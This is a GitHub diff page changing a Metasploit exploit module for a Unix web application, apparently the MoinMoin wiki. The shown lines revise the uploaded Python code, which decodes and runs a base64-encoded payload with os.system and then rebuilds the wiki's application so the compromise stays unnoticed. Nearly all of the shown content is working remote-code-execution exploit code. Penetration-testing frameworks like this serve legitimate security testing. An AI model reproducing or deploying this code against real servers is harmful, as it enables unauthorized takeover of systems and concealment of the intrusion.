File tree Expand file tree Collapse file tree 1 file changed +5
-2
lines changed
modules/exploits/unix/webapp Expand file tree Collapse file tree 1 file changed +5
-2
lines changed Original file line number Diff line number Diff line change @@ -217,7 +217,6 @@ def writable_page?(session)
217217 return true
218218 end
219219
220-
221220 def exploit
222221
223222 # Init variables
@@ -250,7 +249,11 @@ def exploit
250249
251250 # Upload payload
252251 print_status ( "Trying to upload payload..." )
253- python_cmd = "import os\n os.system(\" #{ Rex ::Text . encode_base64 ( payload . encoded ) } \" .decode(\" base64\" ))"
252+ python_cmd = "import sys, os\n "
253+ python_cmd << "os.system(\" #{ Rex ::Text . encode_base64 ( payload . encoded ) } \" .decode(\" base64\" ))\n "
254+ python_cmd << "sys.path.insert(0, '/usr/local/share/moin')\n "
255+ python_cmd << "from MoinMoin.web.serving import make_application\n "
256+ python_cmd << "application = make_application(shared=True)"
254257 res = upload_code ( session , "exec('#{ Rex ::Text . encode_base64 ( python_cmd ) } )
255258 if not res
256259 fail_with ( Exploit ::Failure ::Unknown , "Error uploading the payload" )
You can’t perform that action at this time.
0 commit comments